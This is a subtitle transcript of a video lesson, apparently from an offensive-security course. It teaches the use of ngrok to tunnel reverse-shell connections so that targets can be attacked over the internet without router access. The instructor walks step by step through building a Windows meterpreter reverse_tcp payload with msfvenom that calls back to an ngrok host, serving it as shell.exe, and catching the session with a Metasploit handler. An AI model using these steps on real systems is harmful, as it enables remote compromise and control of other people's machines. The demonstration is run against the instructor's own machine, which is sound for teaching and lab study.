1
00:00:00,030 --> 00:00:04,620
Hello everybody and welcome back. And
right now before we continue, I just want

2
00:00:04,620 --> 00:00:09,480
to show you an alternative to the port
forwarding attack. Well, basically, the

3
00:00:09,480 --> 00:00:17,490
attack over the Internet. Now let's say,
for example, you are on a cafe Wi-Fi and

4
00:00:17,490 --> 00:00:21,390
you do not have access to the router,
and you, for example, want to port forward,

5
00:00:21,390 --> 00:00:26,640
or actually be able to attack anyone in
the entire world over a link, or

6
00:00:26,640 --> 00:00:31,290
something like that. You can't really
perform the port forwarding since you do

7
00:00:31,289 --> 00:00:34,919
not have access to the router, so you
need to have the alternative for that.

8
00:00:34,920 --> 00:00:41,520
Now the alternative is a program called
ngrok. Now ngrok, I don't think it

9
00:00:41,520 --> 00:00:45,780
comes pre-installed in Kali Linux. We will
not be installing it since it is only

10
00:00:45,780 --> 00:00:51,150
optional. I already have it installed on my laptop. If you want to you can just

11
00:00:51,149 --> 00:00:57,149
go onto your Firefox and just search
installing ngrok commands,

12
00:00:57,149 --> 00:01:02,009
or something like that, and I believe it
is rather easy to install. You would

13
00:01:02,010 --> 00:01:07,890
probably need to make an account on the
website in order for this to work, but I

14
00:01:07,890 --> 00:01:12,330
believe you will do that very easily
since I don't remember having any

15
00:01:12,330 --> 00:01:19,320
problem during the installation of this
program. So, you just go ngrok download,

16
00:01:19,320 --> 00:01:25,160
and then you can actually find it
somewhere. Either on their github

17
00:01:25,159 --> 00:01:29,969
as we can see right here, or you can go
on to their official website and

18
00:01:29,970 --> 00:01:34,080
actually download it from there. Now this is also something you run both on Linux and

19
00:01:34,079 --> 00:01:39,239
both on Windows, so that's good to know
as well. So once you download that you

20
00:01:39,240 --> 00:01:44,340
will have probably an account. And once
you do that, just type here ngrok

21
00:01:44,340 --> 00:01:50,400
--help. I believe it has help options.
Okay, so it does have --help. And

22
00:01:50,399 --> 00:01:54,989
basically what you want to do is
actually perform port forwarding with

23
00:01:54,990 --> 00:02:01,950
this tool, on their website. So what they
allow you is to have an open port on

24
00:02:01,950 --> 00:02:06,480
their website. When someone connects to
their website over some open port, that

25
00:02:06,479 --> 00:02:11,369
will forward the connection straight to
you. So their website actually acts as a

26
00:02:11,370 --> 00:02:16,350
router in that case, as a port forwarder for our own machine. As we can

27
00:02:16,349 --> 00:02:21,809
see some of the examples right here, ngrok http 80, # secure public URL for port

28
00:02:21,810 --> 00:02:27,360
80 web server. So if you were to example
run this, you would be able to give

29
00:02:27,360 --> 00:02:32,610
access to your apache 2 web server to
anyone in the world. For anyone that

30
00:02:32,610 --> 00:02:38,700
actually types the link with your open
port. Now you might be asking, well isn't

31
00:02:38,700 --> 00:02:42,450
that the same as hosting and how
does this come for free?

32
00:02:42,450 --> 00:02:48,270
Well, the free version actually changes
your port every time you restart the

33
00:02:48,269 --> 00:02:54,389
ngrok, so you will not be able to have a
static address for this. But you can pay

34
00:02:54,390 --> 00:02:57,930
for I believe professional version,
or something like that, where they

35
00:02:57,930 --> 00:03:03,030
actually allow you to have the same port
every time you run ngrok. But right

36
00:03:03,030 --> 00:03:11,010
now what we want to do is actually type
ngrok tcp, and then we want to use the

37
00:03:11,010 --> 00:03:16,680
port that we want to forward in our
Kali Linux machine, or basically in my

38
00:03:16,680 --> 00:03:22,530
laptop in this case. So let's just say
port 5555. And then when

39
00:03:22,530 --> 00:03:26,910
we run this you will see that it will
actually try to connect to

40
00:03:26,910 --> 00:03:31,200
their web server, and soon enough I
believe it will give us an open port on

41
00:03:31,200 --> 00:03:36,810
their website. So, reconnecting...it will
give you some of these timeout sessions.

42
00:03:36,810 --> 00:03:40,650
But, don't worry, I believe in a few
seconds that this will perform a full

43
00:03:40,650 --> 00:03:47,150
connection to their website. So let's
wait for that to happen.

44
00:03:51,240 --> 00:03:56,970
And here we are, we can see that we are
currently online. So, the few things that

45
00:03:56,970 --> 00:04:02,190
we have right here is the session status,
which is the status of our current web

46
00:04:02,190 --> 00:04:06,570
server, or not web server, our open port.
The account that I made when I was

47
00:04:06,570 --> 00:04:11,820
making the ngrok was this one. As we
can see it is plan 3, which means I do

48
00:04:11,820 --> 00:04:16,740
not have the premium version. Update
available, doesn't matter. The version, the

49
00:04:16,739 --> 00:04:22,589
region, United States. The forwarding is
done on this link right here. So this is

50
00:04:22,590 --> 00:04:27,120
the link, and this is your port that they
use in order to forward your connection.

51
00:04:27,120 --> 00:04:35,850
So it is forwarding it to our local host
at port 5555. So, with

52
00:04:35,850 --> 00:04:41,610
this you do not need to actually port
forward anything in the router. You can

53
00:04:41,610 --> 00:04:45,870
just bring your laptop anywhere and
perform the attack over the entire

54
00:04:45,870 --> 00:04:48,930
Internet. But right now there are few
things also that you need to change

55
00:04:48,930 --> 00:04:54,600
while running this. So, let's open another
terminal right here, and let me change my

56
00:04:54,600 --> 00:05:01,710
directory to the desktop directory. Now
let's say we want to make a payload, and

57
00:05:01,710 --> 00:05:06,600
we want to make that payload connect
back to us. So what we want to do is

58
00:05:06,600 --> 00:05:14,280
msfvenom -p, and let's create a simple
windows/meterpreter/reverse_tcp. And now

59
00:05:14,280 --> 00:05:19,680
in the LHOST you would want to specify
this. So you would want to specify this

60
00:05:19,680 --> 00:05:25,770
link right here, so 0.tcp.ngrok.io. Now that I believe

61
00:05:25,770 --> 00:05:32,370
link it will be the same for everyone, so
you just specify that link. And what that

62
00:05:32,370 --> 00:05:37,830
will do is when the target that you send this file to runs

63
00:05:37,830 --> 00:05:42,030
this, it will connect to their website on
this port. So you need to set the local

64
00:05:42,030 --> 00:05:47,970
host to be 0.tcp.ngrok.io,
and local port to be the port that they

65
00:05:47,970 --> 00:05:54,720
give us. So, 14583 in my case, so 14583. Now let me just enlarge this a

66
00:05:54,720 --> 00:06:00,360
little bit, so zoom in. And after this
what you want to specify is the same as

67
00:06:00,360 --> 00:06:05,160
before. So you can use encoder if you
want to, but I will not use in this case.

68
00:06:05,160 --> 00:06:13,650
So file exe, and we put that into shell.exe. This will create a simple windows

69
00:06:13,650 --> 00:06:18,030
meterpreter reverse shell for us that will
perform a connection to their website on

70
00:06:18,030 --> 00:06:23,130
this port. Now what that website will do
then is it will forward that connection to

71
00:06:23,130 --> 00:06:29,880
our local host, which is 0.0.0.0 on port 5555. Now it means that

72
00:06:29,880 --> 00:06:34,740
actually it will forward it to all interfaces I believe, so you will be able

73
00:06:34,740 --> 00:06:38,220
to receive connection. There are also
some of the things that you need to

74
00:06:38,220 --> 00:06:47,010
change in the msfconsole as well.
So I will show you that as well right

75
00:06:47,010 --> 00:06:51,660
now. Let me just, first of all, what you
want to do is, first of all, become

76
00:06:51,660 --> 00:06:58,890
root. And then copy this shell.exe
into /var/www/html/ so I can download it on

77
00:06:58,890 --> 00:07:04,830
my Windows 10 machine. So let's do that
as well. Now while I do that I will run

78
00:07:04,830 --> 00:07:11,280
here msfconsole. So we let this open, and
then I will show you what you need to

79
00:07:11,280 --> 00:07:17,340
specify in order for this to actually
work. So the simple thing you need to do

80
00:07:17,340 --> 00:07:22,460
is basically same as before, so you need
to type here use exploit/multi/

81
00:07:22,460 --> 00:07:29,430
handler. Once you do that, you basically
just need to set the payload as the

82
00:07:29,430 --> 00:07:38,670
payload that you use, so in my case it is
windows/meterpreter/reverse_tcp. Now here

83
00:07:38,669 --> 00:07:44,789
as we show options right here, you want
to set the LHOST to be 0.0.0.0, and you

84
00:07:44,790 --> 00:07:48,660
want the LPORT to be 5555, since that is the LPORT that we

85
00:07:48,660 --> 00:07:55,560
specified in the ngrok command. So set
LPORT to be 5555. After

86
00:07:55,560 --> 00:07:57,900
you do all of that you should be good to
go.

87
00:07:57,900 --> 00:08:06,450
So I will just run my shell.exe
over my Windows 10 machine. Let me just

88
00:08:06,450 --> 00:08:12,630
find it where I saved it. While I do that,
I will just run this exploit -j -z so it runs

89
00:08:12,630 --> 00:08:15,620
in the background.

90
00:08:20,039 --> 00:08:27,429
Right now I will run my shell.exe. It
will ask me do I want to run it since I

91
00:08:27,429 --> 00:08:32,289
actually downloaded it from the Apache 2. Whoops, let me just scroll

92
00:08:32,289 --> 00:08:36,989
this back down. I want to click more info run anyway, and

93
00:08:36,990 --> 00:08:42,820
we can see that I got the meterpreter
session opened. So we were actually able

94
00:08:42,819 --> 00:08:50,109
to connect, or basically to hack a remote target that is actually

95
00:08:50,110 --> 00:08:55,270
across the globe. Now my Windows 10 machine isn't really across the globe, but this

96
00:08:55,269 --> 00:09:00,069
will work wherever that machine was, since we actually made that machine

97
00:09:00,069 --> 00:09:04,749
connect back to this link right here,
which is a publicly available link. If

98
00:09:04,749 --> 00:09:13,209
I go right here on my Firefox as we can
see right here, sessions, sessions -i 1.

99
00:09:13,209 --> 00:09:19,869
If I getuid you will see that this
is my Windows 10 machine. So we can close

100
00:09:19,870 --> 00:09:23,800
this since we don't need to do anything
anymore, and let me close this terminal

101
00:09:23,800 --> 00:09:35,500
as well. And if we use this link right
here and copy it, you will see that there

102
00:09:35,500 --> 00:09:40,390
actually is a connection to that link. If
I were to, for example, set up a listener

103
00:09:40,389 --> 00:09:45,489
and paste this right here, the listener
would be able to, it would actually

104
00:09:45,490 --> 00:09:51,040
perform a meterpreter shell opening. But, the shell won't really work,

105
00:09:51,040 --> 00:09:55,030
there is no payload on this website. Now
it says the connection was reset because

106
00:09:55,029 --> 00:09:58,419
we are not really listening for any
connections at the moment, so we can't

107
00:09:58,420 --> 00:10:05,380
actually go to the page. So, that would be
about it for this ngrok tutorial. It is

108
00:10:05,379 --> 00:10:09,639
an alternative to port forwarding if you
are, for example, not doing the over

109
00:10:09,639 --> 00:10:15,849
internet attacks over your own network,
with your own router. So you can use this in

110
00:10:15,850 --> 00:10:21,130
order to perform a simple port forward
with the ngrok website. So, hope you

111
00:10:21,129 --> 00:10:26,219
enjoyed this video and hope I see you in
the next one. Bye!